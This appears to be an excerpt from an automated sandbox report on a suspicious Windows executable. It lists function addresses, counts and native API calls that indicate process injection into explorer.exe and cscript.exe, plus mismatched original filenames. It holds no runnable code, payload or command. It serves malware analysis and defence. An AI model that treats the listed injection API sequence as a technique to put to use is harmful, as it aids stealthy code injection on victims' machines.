Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342BACEB	2_2_342BACEB
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34277CE8	2_2_34277CE8
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34208CDF	2_2_34208CDF
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AFD27	2_2_342AFD27
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EAD00	2_2_341EAD00
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A7D4C	2_2_342A7D4C
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0D69	2_2_341F0D69
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34202DB0	2_2_34202DB0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F9DD0	2_2_341F9DD0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3428FDF4	2_2_3428FDF4
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34290E6D	2_2_34290E6D
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34232E48	2_2_34232E48
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34210E50	2_2_34210E50
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A0EAD	2_2_342A0EAD
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F1EB2	2_2_341F1EB2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E2EE8	2_2_341E2EE8
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341FCF00	2_2_341FCF00
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AFF63	2_2_342AFF63
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426FF40	2_2_3426FF40
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AEFBF	2_2_342AEFBF
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A1FC6	2_2_342A1FC6
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F6FE0	2_2_341F6FE0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34290835	2_2_34290835
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F3800	2_2_341F3800
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421E810	2_2_3421E810
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420B870	2_2_3420B870
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34265870	2_2_34265870
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AF872	2_2_342AF872
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F9870	2_2_341F9870
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341D6868	2_2_341D6868
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342698B2	2_2_342698B2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34206882	2_2_34206882
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A78F3	2_2_342A78F3
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F28C0	2_2_341F28C0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342A18DA	2_2_342A18DA
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AE9A6	2_2_342AE9A6
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341EE9A0	2_2_341EE9A0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342359C0	2_2_342359C0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342ACA13	2_2_342ACA13
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AEA5B	2_2_342AEA5B
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420FAA0	2_2_3420FAA0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AFA89	2_2_342AFA89
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AFB2E	2_2_342AFB2E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0B10	2_2_341F0B10
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3422DB19	2_2_3422DB19
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34264BC0	2_2_34264BC0
Source: C:\Windows\explorer.exe	Code function: 4_2_0A72F232	4_2_0A72F232
Source: C:\Windows\explorer.exe	Code function: 4_2_0A72E036	4_2_0A72E036
Source: C:\Windows\explorer.exe	Code function: 4_2_0A725082	4_2_0A725082
Source: C:\Windows\explorer.exe	Code function: 4_2_0A729B32	4_2_0A729B32
Source: C:\Windows\explorer.exe	Code function: 4_2_0A729B30	4_2_0A729B30
Source: C:\Windows\explorer.exe	Code function: 4_2_0A72C912	4_2_0A72C912
Source: C:\Windows\explorer.exe	Code function: 4_2_0A726D02	4_2_0A726D02
Source: C:\Windows\explorer.exe	Code function: 4_2_0A7325CD	4_2_0A7325CD
Source: C:\Windows\explorer.exe	Code function: 4_2_119025CD	4_2_119025CD
Source: C:\Windows\explorer.exe	Code function: 4_2_118F6D02	4_2_118F6D02
Source: C:\Windows\explorer.exe	Code function: 4_2_118FC912	4_2_118FC912
Source: C:\Windows\explorer.exe	Code function: 4_2_118F5082	4_2_118F5082
Source: C:\Windows\explorer.exe	Code function: 4_2_118FE036	4_2_118FE036
Source: C:\Windows\explorer.exe	Code function: 4_2_118F9B32	4_2_118F9B32
Source: C:\Windows\explorer.exe	Code function: 4_2_118F9B30	4_2_118F9B30
Source: C:\Windows\explorer.exe	Code function: 4_2_118FF232	4_2_118FF232
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04660445	5_2_04660445
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0472A526	5_2_0472A526
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04684670	5_2_04684670
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0467C600	5_2_0467C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0465C6E0	5_2_0465C6E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471A6C0	5_2_0471A6C0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04660680	5_2_04660680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04662760	5_2_04662760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0466A760	5_2_0466A760
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04716757	5_2_04716757
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0470E076	5_2_0470E076
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046500A0	5_2_046500A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0472010E	5_2_0472010E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0466E310	5_2_0466E310
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471EC60	5_2_0471EC60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04716C69	5_2_04716C69
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0470EC4C	5_2_0470EC4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0466AC20	5_2_0466AC20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046DEC20	5_2_046DEC20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04650C12	5_2_04650C12
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0472ACEB	5_2_0472ACEB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04678CDF	5_2_04678CDF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04660D69	5_2_04660D69
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0465AD00	5_2_0465AD00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04672DB0	5_2_04672DB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04700E6D	5_2_04700E6D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046A2E48	5_2_046A2E48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04680E50	5_2_04680E50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04652EE8	5_2_04652EE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04710EAD	5_2_04710EAD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0466CF00	5_2_0466CF00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04666FE0	5_2_04666FE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471EFBF	5_2_0471EFBF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04646868	5_2_04646868
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04700835	5_2_04700835
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0468E810	5_2_0468E810
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046628C0	5_2_046628C0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04676882	5_2_04676882
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0465E9A0	5_2_0465E9A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471E9A6	5_2_0471E9A6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471EA5B	5_2_0471EA5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471CA13	5_2_0471CA13
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04660B10	5_2_04660B10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046D4BC0	5_2_046D4BC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046CD480	5_2_046CD480
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046F5490	5_2_046F5490
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_047175C6	5_2_047175C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471F5C9	5_2_0471F5C9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0470D646	5_2_0470D646
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046FD62C	5_2_046FD62C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046D36EC	5_2_046D36EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471F6F6	5_2_0471F6F6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_047170F1	5_2_047170F1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0466B0D0	5_2_0466B0D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0469508C	5_2_0469508C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046A717A	5_2_046A717A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046FD130	5_2_046FD130
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0464F113	5_2_0464F113
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0467B1E0	5_2_0467B1E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046651C0	5_2_046651C0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471124C	5_2_0471124C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0464D2EC	5_2_0464D2EC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471F330	5_2_0471F330
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04651380	5_2_04651380
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04663C60	5_2_04663C60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046E7CE8	5_2_046E7CE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0467FCE0	5_2_0467FCE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046F9C98	5_2_046F9C98
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04717D4C	5_2_04717D4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471FD27	5_2_0471FD27
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046FFDF4	5_2_046FFDF4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04669DD0	5_2_04669DD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04661EB2	5_2_04661EB2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471FF63	5_2_0471FF63
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046DFF40	5_2_046DFF40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04711FC6	5_2_04711FC6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471F872	5_2_0471F872
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04669870	5_2_04669870
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0467B870	5_2_0467B870
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046D5870	5_2_046D5870
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04663800	5_2_04663800
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_047178F3	5_2_047178F3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_047118DA	5_2_047118DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046D98B2	5_2_046D98B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046A59C0	5_2_046A59C0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0467FAA0	5_2_0467FAA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471FA89	5_2_0471FA89
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0471FB2E	5_2_0471FB2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_0469DB19	5_2_0469DB19
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046F1B80	5_2_046F1B80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AE0FD	5_2_021AE0FD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AD5A6	5_2_021AD5A6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AE821	5_2_021AE821
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_02199E5B	5_2_02199E5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_02199E60	5_2_02199E60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_02192FB0	5_2_02192FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_02192D90	5_2_02192D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_02192D87	5_2_02192D87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AEDE3	5_2_021AEDE3

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: String function: 3425E692 appears 86 times
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: String function: 3426EF10 appears 105 times
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: String function: 34225050 appears 36 times
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: String function: 34237BE4 appears 97 times
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: String function: 341DB910 appears 272 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0464B910 appears 275 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 046CE692 appears 86 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 046DEF10 appears 105 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 046A7BE4 appears 99 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 04695050 appears 56 times

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222C30 NtMapViewOfSection,LdrInitializeThunk,	2_2_34222C30
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222C50 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_34222C50
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222CF0 NtDelayExecution,LdrInitializeThunk,	2_2_34222CF0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_34222D10
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222DA0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_34222DA0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_34222DC0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222E50 NtCreateSection,LdrInitializeThunk,	2_2_34222E50
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222EB0 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_34222EB0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222ED0 NtResumeThread,LdrInitializeThunk,	2_2_34222ED0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222F00 NtCreateFile,LdrInitializeThunk,	2_2_34222F00
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342229F0 NtReadFile,LdrInitializeThunk,	2_2_342229F0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222A80 NtClose,LdrInitializeThunk,	2_2_34222A80
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222B10 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_34222B10
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_34222B90
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222BC0 NtQueryInformationToken,LdrInitializeThunk,	2_2_34222BC0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342234E0 NtCreateMutant,	2_2_342234E0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34224570 NtSuspendThread,	2_2_34224570
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34224260 NtSetContextThread,	2_2_34224260
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222C20 NtSetInformationFile,	2_2_34222C20
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34223C30 NtOpenProcessToken,	2_2_34223C30
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222C10 NtOpenProcess,	2_2_34222C10
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34223C90 NtOpenThread,	2_2_34223C90
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222CD0 NtEnumerateKey,	2_2_34222CD0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222D50 NtWriteVirtualMemory,	2_2_34222D50
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222E00 NtQueueApcThread,	2_2_34222E00
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222E80 NtCreateProcessEx,	2_2_34222E80
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222EC0 NtQuerySection,	2_2_34222EC0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222F30 NtOpenDirectoryObject,	2_2_34222F30
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222FB0 NtSetValueKey,	2_2_34222FB0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342238D0 NtGetContextThread,	2_2_342238D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342229D0 NtWaitForSingleObject,	2_2_342229D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222A10 NtWriteFile,	2_2_34222A10
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222AA0 NtQueryInformationFile,	2_2_34222AA0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222AC0 NtEnumerateValueKey,	2_2_34222AC0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222B20 NtQueryInformationProcess,	2_2_34222B20
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222B00 NtQueryValueKey,	2_2_34222B00
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222B80 NtCreateKey,	2_2_34222B80
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34222BE0 NtQueryVirtualMemory,	2_2_34222BE0
Source: C:\Windows\explorer.exe	Code function: 4_2_0A72F232 NtCreateFile,	4_2_0A72F232
Source: C:\Windows\explorer.exe	Code function: 4_2_0A730E12 NtProtectVirtualMemory,	4_2_0A730E12
Source: C:\Windows\explorer.exe	Code function: 4_2_0A730E0A NtProtectVirtualMemory,	4_2_0A730E0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692C30 NtMapViewOfSection,LdrInitializeThunk,	5_2_04692C30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692CF0 NtDelayExecution,LdrInitializeThunk,	5_2_04692CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692D10 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04692D10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_04692DC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692E50 NtCreateSection,LdrInitializeThunk,	5_2_04692E50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692F00 NtCreateFile,LdrInitializeThunk,	5_2_04692F00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046929F0 NtReadFile,LdrInitializeThunk,	5_2_046929F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692A80 NtClose,LdrInitializeThunk,	5_2_04692A80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692B00 NtQueryValueKey,LdrInitializeThunk,	5_2_04692B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692B10 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04692B10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692BC0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04692BC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692B80 NtCreateKey,LdrInitializeThunk,	5_2_04692B80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692B90 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04692B90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046934E0 NtCreateMutant,LdrInitializeThunk,	5_2_046934E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04694570 NtSuspendThread,	5_2_04694570
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04694260 NtSetContextThread,	5_2_04694260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692C50 NtUnmapViewOfSection,	5_2_04692C50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692C20 NtSetInformationFile,	5_2_04692C20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692C10 NtOpenProcess,	5_2_04692C10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692CD0 NtEnumerateKey,	5_2_04692CD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692D50 NtWriteVirtualMemory,	5_2_04692D50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692DA0 NtReadVirtualMemory,	5_2_04692DA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692E00 NtQueueApcThread,	5_2_04692E00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692EC0 NtQuerySection,	5_2_04692EC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692ED0 NtResumeThread,	5_2_04692ED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692EB0 NtProtectVirtualMemory,	5_2_04692EB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692E80 NtCreateProcessEx,	5_2_04692E80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692F30 NtOpenDirectoryObject,	5_2_04692F30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692FB0 NtSetValueKey,	5_2_04692FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046929D0 NtWaitForSingleObject,	5_2_046929D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692A10 NtWriteFile,	5_2_04692A10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692AC0 NtEnumerateValueKey,	5_2_04692AC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692AA0 NtQueryInformationFile,	5_2_04692AA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692B20 NtQueryInformationProcess,	5_2_04692B20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04692BE0 NtQueryVirtualMemory,	5_2_04692BE0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04693C30 NtOpenProcessToken,	5_2_04693C30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_04693C90 NtOpenThread,	5_2_04693C90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046938D0 NtGetContextThread,	5_2_046938D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AA360 NtCreateFile,	5_2_021AA360
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AA410 NtReadFile,	5_2_021AA410
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AA490 NtClose,	5_2_021AA490
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AA540 NtAllocateVirtualMemory,	5_2_021AA540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AA53A NtAllocateVirtualMemory,	5_2_021AA53A

Source: MaMsKRmgXZ.exe, 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameeskatologiskes outsubtle.exe4 vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.0000000034480000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033F81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000000.9724800728.000000000043A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameeskatologiskes outsubtle.exe4 vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs MaMsKRmgXZ.exe
Source: MaMsKRmgXZ.exe, 00000002.00000003.9889030155.0000000034138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Section loaded: edgegdi.dll	Jump to behavior
